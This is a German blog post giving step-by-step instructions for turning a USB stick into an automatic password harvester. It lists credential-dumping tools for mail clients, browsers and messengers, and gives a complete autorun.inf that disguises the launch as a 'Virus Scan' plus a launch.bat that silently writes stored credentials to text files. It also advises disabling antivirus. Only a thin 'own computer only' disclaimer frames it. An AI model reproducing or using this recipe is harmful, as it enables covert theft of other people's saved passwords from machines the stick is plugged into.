USB Stick zum Passwort sammeln präparieren.


Gerade habe ich meinem USB Stick etwas umgerüstet, um auf die Schnelle und natürlich nur zu Testzwecken ein paar Daten automatisiert zu sammeln. Alles zusammen benötigt gerade mal 150k auf einem USB Stick.
Im Netz findet man eine ganze Menge Ideen, wie man das bewerkstelligen könnte. Als erstes braucht man ein paar Programme, welche den Job automatisiert im Hintergrund erledigen und alle Daten in eine txt Datei schreiben. Windows speichert eine ganze Menge an Passwörtern für unkritische Dienste wie Messanger  AOL,Yahoo, MSN u.s.w lokal ab. Weiterhin ist es nicht schwer an Accountdaten von Outlook Express, FTP Accounts oder Passwörtern von Webseiten zu kommen, die noch in diversen Browsern geparkt werden.
Auf die Schnelle könnte man
Mail PassView zum Auslesen der Mailclients Outlook Express, Microsoft Outlook 2000 (POP3 and SMTP ), Microsoft Outlook 2002/2003 (POP3, IMAP, HTTP und SMTP Accounts), IncrediMail, Eudora, Netscape Mail, Mozilla Thunderbird, Group Mail Free benutzen.
PasswordFox PasswordFox übernimmt Daten aus dem Mozilla Firefox.
MessenPass funktioniert zum Auslesen von Passwörtern von diversen Messengern  MSN Messenger, Windows Messenger, Yahoo Messenger, ICQ Lite 4.x/2003, AOL Instant Messenger , Trillian, Miranda.
IE Passview der Name sagt ja schon alles.
Protected Storage PassView Wer immer schön den Haken [x] Kennwort speichern anklickt, dürfte hier auf seine Kosten kommen.
Die Links verweisen auf eine Suchmaschine und auf keinen Direktlink. Vermutlich findet ihr schon einen Weg an die Files zu kommen. Passt aber auf, ob sich nicht ein Trojaner eingeschlichen hat. Ich übernehme dafür natürlich keine Verantwortung.
Nun zum Zusammenstellen der Daten…
Entpackt die jeweiligen exe files in das root-Verzeichnis vom Stick. Alle anderen Dateien werden nicht benötigt. Es wären also
mspass.exe, mailpv.exe, iepv.exe, pspv.exe und passwordfox.exe.
Erstellt eine Datei namens autorun.inf mit folgendem Inhalt

[autorun]
open=launch.bat
ACTION= Virus Scan

Danach noch eine launch.bat mit

@echo off
start mspass.exe /stext mspass.txt
start mailpv.exe /stext mailpv.txt
start iepv.exe /stext iepv.txt
start pspv.exe /stext pspv.txt
start passwordfox.exe /stext passwordfox.txt

Beide Dateien sollten natürlich auch ins Hauptverzeichnis vom Strick kopiert werden.
Dies sollte unter Windows 2000, XP and Vista laufen. W7 habe ich nicht getestet.
Um es noch einmal klar zu sagen: Ich übernehme keinerlei Haftung für diese Gedankengänge. Wenn ihr es testen solltet – nur an eurem eigenen Rechner, um die Funktionsweise zu studieren !
P.s. macht den Virenscanner aus, dann kommen weniger Meldungen.

Schreibe einen Kommentar

Deine E-Mail-Adresse wird nicht veröffentlicht. Erforderliche Felder sind mit * markiert.